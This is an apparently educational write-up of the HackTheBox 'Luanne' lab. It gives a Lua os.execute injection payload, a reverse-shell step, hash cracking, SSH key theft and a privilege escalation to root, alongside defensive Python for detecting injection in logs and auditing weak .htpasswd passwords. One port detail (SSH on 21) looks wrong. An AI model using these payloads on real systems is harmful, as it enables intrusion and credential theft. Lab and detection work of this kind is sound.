Today we are going to crack a machine called Luanne, created by polarbearer. It is a Capture the Flag style challenge hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
- Network Scanning
  - Nmap Scan
- Enumeration
  - Enumerating HTTP Service
  - Directory Bruteforce using Gobuster
  - Fuzzing Web API
- Exploitation
  - Injecting the Lua RCE
  - Getting the Shell
  - Extracting webapi_user hash
  - Enumerating using netstat
  - Decrypting hash using John the Ripper
  - Enumerating user r.michaels
  - Getting SSH Private Key
  - Connecting via SSH as r.michaels
  - Reading User Flag
- Privilege Escalation
  - Enumerating Backups
  - Decoding Backups
  - Extracting webapi_user hash
  - Decrypting hash using John the Ripper
  - Getting Root Shell
  - Reading the Root Flag
Walkthrough
To attack any machine we first need its IP address. Machines hosted on HackTheBox have a static IP address.
IP Address assigned: 10.129.147.195
Network Scanning
Now that we have the IP address, we need to enumerate the open ports on the machine. For this we run an Nmap scan.
nmap -A 10.129.147.195
The Nmap scan gives us quite a bit of information. It shows three services running on the target machine: an SSH service on port 21, an HTTP service on port 80, and a second HTTP service on port 9001.
Enumeration
Since we have no credentials to log in over SSH, we start with the HTTP service on port 80. There isn’t much to go on, because we are blocked by an authentication prompt. We tried a number of common usernames and passwords but were unable to get past it.
http://10.129.147.195
Another thing we can do at this stage is a directory brute force, and we use gobuster for this task. We tried several different wordlists and finally found robots.txt, as shown in the image below.
gobuster dir --url http://10.129.147.195/ --wordlist /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
To look at the contents of robots.txt we used the web browser. There is a directory named weather in the Disallow section, together with a note saying that it returns a Not Found error but is still able to “harvest” cities. That doesn’t make much sense at this point.
http://10.129.147.195/robots.txt
Since we have gobuster at our disposal, we let it run against the weather directory as well. It gave us another directory named forecast. Maybe it is a weather forecasting application; we will see along the way.
gobuster dir --url http://10.129.147.195/weather/ --wordlist /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
Opening the forecast page in the browser, we get a JSON response: an error message saying that the city is missing. It tells us to pass the city parameter with the value list to get the list of available cities.
10.129.147.195/weather/forecast
We added the city parameter to the URL with the value list and got what we wanted: a small list of cities in the UK.
10.129.147.195/weather/forecast?city=list
After playing with the parameter and its values, we appended a single quote to London to see what kind of response we would get. It returned a Lua error, and the good news was that the error message included a directory path.
10.129.147.195/weather/forecast?city=London'
Since we broke the query with a quote, we tried to close the string again and insert our own code in the hope of getting an injection out of it. After trying several variations, we got Remote Command Execution through os.execute. We demonstrate this by reading the /etc/passwd file with the cat command.
10.129.147.195/weather/forecast?city=London')os.execute("cat /etc/passwd")--
To turn this command execution into a shell, we decided it was best to URL-encode the reverse shell command. We did this with the website urlencoder.org. Make sure to use the VPN IP address of your attacking machine and a port on it.
We chose port 1234 as the port on which we want to receive the shell, so before executing the command we started a Netcat listener on that port. Then we submitted the URL-encoded reverse shell command as shown in the image.
10.129.147.195/weather/forecast?city=London')os.execute("URL Encoded Reverse Shell Code")--
As soon as the command executed, we got a shell on the target machine. We used ls to look for clues and found the .htpasswd file. Reading it, we see a user named webapi_user together with its password hash. After getting the shell we also checked the network connections and found an internal service listening on port 3001.
nc -lvp 1234
ls -la
cat .htpasswd
netstat -ant
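The quote probe and the os.execute payload above are exactly what a defender would want to spot in the web server’s access log, and the gobuster runs earlier in the walkthrough leave a burst of 404 responses from a single client. The following Python script is an added example, not code from the original writeup or from the Luanne machine: it parses constructed access-log lines in common log format, URL-decodes every query parameter and flags values containing Lua code-injection indicators, and separately reports clients whose 404 count reaches a threshold. The client address 10.10.14.2, the timestamps and the response sizes are made up; the log format, the indicator list and the default threshold are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample (common log format). The client IP, timestamps
# and sizes are invented; the request paths mirror the enumeration and
# injection steps in the writeup.
SAMPLE_LOG = """\
10.10.14.2 - - [16/Sep/2020:10:01:12 +0000] "GET /robots.txt HTTP/1.1" 200 45
10.10.14.2 - - [16/Sep/2020:10:01:20 +0000] "GET /weather/admin HTTP/1.1" 404 0
10.10.14.2 - - [16/Sep/2020:10:01:21 +0000] "GET /weather/backup HTTP/1.1" 404 0
10.10.14.2 - - [16/Sep/2020:10:01:22 +0000] "GET /weather/forecast HTTP/1.1" 200 88
10.10.14.2 - - [16/Sep/2020:10:01:30 +0000] "GET /weather/forecast?city=list HTTP/1.1" 200 221
10.10.14.2 - - [16/Sep/2020:10:02:05 +0000] "GET /weather/forecast?city=London%27 HTTP/1.1" 500 312
10.10.14.2 - - [16/Sep/2020:10:02:41 +0000] "GET /weather/forecast?city=London%27)os.execute(%22cat%20/etc/passwd%22)-- HTTP/1.1" 200 1024
10.10.14.5 - - [16/Sep/2020:10:03:00 +0000] "GET /weather/forecast?city=Manchester HTTP/1.1" 200 143
"""

# One common-log-format line: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators checked against each URL-decoded parameter value, most specific
# first. A city name never legitimately contains a Lua call, a quote followed
# by a closing parenthesis, a Lua line comment, or a quote at all.
INDICATORS = [
    ("lua-call", re.compile(r"\b(os\.execute|io\.popen|io\.open|loadstring|load|dofile|require)\s*\(", re.I)),
    ("quote-break", re.compile(r"""['"]\s*\)""")),
    ("comment", re.compile(r"--")),
    ("quote", re.compile(r"""['"]""")),
]


def find_lua_injection_attempts(log_lines):
    """Return one finding per query parameter value that matches an indicator, in log order."""
    findings = []
    for line in log_lines.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes the values, so %27 and %22 become ' and "
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                reasons = [label for label, rx in INDICATORS if rx.search(value)]
                if reasons:
                    findings.append({
                        "ip": m["ip"], "param": name, "value": value,
                        "status": int(m["status"]), "reasons": reasons,
                    })
    return findings


def find_bruteforce_sources(log_lines, threshold=50):
    """Return {ip: count} for clients whose number of 404 responses reaches the threshold."""
    counts = {}
    for line in log_lines.splitlines():
        m = LOG_RE.match(line)
        if m and m["status"] == "404":
            counts[m["ip"]] = counts.get(m["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for f in find_lua_injection_attempts(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']}={f['value']!r} status={f['status']} {','.join(f['reasons'])}")
    print("directory brute force sources:", find_bruteforce_sources(SAMPLE_LOG, threshold=2))
```

The quote-only probe is reported with its 500 status, which is the earliest signal: a single quote that turns into a server error means user input reached an interpreter. The threshold of 50 for the 404 count is a placeholder; against a real log it should be tuned per site, and gobuster with the wordlist used in this writeup would produce thousands.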
We saved the hash we found into a file named luannehash and ran John the Ripper against it. It turned out to be an MD5 hash, and it cracked to iamthebest. Now we have the password for the user webapi_user.
john --wordlist=/usr/share/wordlists/rockyou.txt luannehash
We tried the credentials we found to connect to the target machine over SSH, but were not allowed to log in. So we went back to our shell and enumerated further. We found another user named r.michaels, and in that user’s directory, served by the internal web service on port 3001, we found an SSH private key that we can use to log in. We used curl with the webapi_user credentials to read the contents of the id_rsa file.
curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa
After copying the key to our Kali machine and setting the appropriate permissions, we were able to log in to the target machine as r.michaels over SSH. We were greeted by the NetBSD message. Listing the files in the home directory again gave us the user flag. We also found a backups directory, and inside it a backup file named devel_backup-2020-09-16.tar.gz.enc.
ssh -i key r.michaels@10.129.147.195
ls -la
cat user.txt
cd backups
ls -la
Since it appeared to be encrypted, we used the netpgp command to decrypt the backup into raj.tar.gz, then extracted the archive we had just decrypted into the tmp directory. On closer inspection it looks very similar to the www directory we visited earlier, and it also contains a .htpasswd file. Reading that file, the hash is different from the first one.
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/raj.tar.gz
cd /tmp
tar -xf raj.tar.gz
cd devel-2020-09-16/
ls
cd www
ls -la
cat .htpasswd
We took this hash back to Kali Linux and cracked it with John the Ripper as before, this time saving it in a file named hash. The password came out as littlebear, as shown in the image below.
john --wordlist=/usr/share/wordlists/rockyou.txt hash
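Both .htpasswd hashes in this walkthrough (webapi_user’s in the web root, cracked to iamthebest, and the one in the decrypted backup, cracked to littlebear) fell to the rockyou wordlist. The following Python code is an added example, not code from the original writeup: it implements the crypt(3) MD5 scheme (the $1$ format; the page only says the hash was MD5, so treating it as $1$ is my assumption, and the Apache $apr1$ variant differs only in its magic string) and audits .htpasswd entries against a short weak-password list, which is the defender’s version of the two John runs above. The sample .htpasswd files, their salts, the admin entry and the password list are constructed for this example.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    # crypt(3)-style base64: least significant 6 bits first, `count` characters
    return "".join(ITOA64[(value >> (6 * i)) & 0x3F] for i in range(count))


def md5crypt(password, salt, magic="$1$"):
    """crypt(3) MD5 scheme as used by NetBSD/FreeBSD/Linux ($1$) and Apache ($apr1$)."""
    pw = password.encode()
    salt_b = salt.encode()[:8]           # salt is at most 8 characters
    ctx = hashlib.md5(pw + magic.encode() + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    remaining = len(pw)
    while remaining > 0:                  # mix in the alternate digest, one block per 16 pw bytes
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(pw)
    while bit:                            # one byte per bit of len(pw): NUL or the first pw byte
        ctx.update(b"\0" if bit & 1 else pw[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                 # the 1000-round stretching loop
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    encoded += _to64(final[11], 2)
    return f"{magic}{salt_b.decode()}${encoded}"


def verify(password, hashed):
    """Check a candidate password against a $1$ or $apr1$ hash string."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] not in ("1", "apr1"):
        raise ValueError("unsupported hash format: " + hashed)
    magic = "$" + parts[1] + "$"
    return hmac.compare_digest(md5crypt(password, parts[2], magic), hashed)


def parse_htpasswd(text):
    """Return {user: hash} from .htpasswd content, ignoring blank and comment lines."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and ":" in line:
            user, hashed = line.split(":", 1)
            entries[user] = hashed
    return entries


def audit_htpasswd(files, wordlist):
    """For every entry in every file return the first matching weak password, or None."""
    result = {}
    for path, text in files.items():
        for user, hashed in parse_htpasswd(text).items():
            result[f"{path}:{user}"] = next((w for w in wordlist if verify(w, hashed)), None)
    return result


# Constructed sample data: salts, the admin entry and the wordlist are invented;
# the two webapi_user passwords are the ones the writeup cracked.
SAMPLE_FILES = {
    "www/.htpasswd": "webapi_user:" + md5crypt("iamthebest", "luanne01") + "\n"
                     + "admin:" + md5crypt("Kq7!vR2#pLm9", "luanne02") + "\n",
    "backup/.htpasswd": "webapi_user:" + md5crypt("littlebear", "bk2020se", "$apr1$") + "\n",
}
WEAK_PASSWORDS = ["password", "123456", "iamthebest", "letmein", "littlebear"]

if __name__ == "__main__":
    for entry, found in audit_htpasswd(SAMPLE_FILES, WEAK_PASSWORDS).items():
        print(entry, "-> WEAK:" + found if found else "-> not in wordlist")
```

Running the audit against your own .htpasswd files with a real wordlist tells you which entries need rotating before someone else does the same with John. Checking a restored backup with the same code also shows whether a credential that left the box inside an old archive is still valid, which is exactly what made the second .htpasswd here worth cracking.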
We used doas su with the password we had just cracked and were given elevated access. We moved into the root directory to find the final flag and conclude the machine.
doas su
cd /root
cat root.txt
Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. He can be contacted on Twitter and LinkedIn.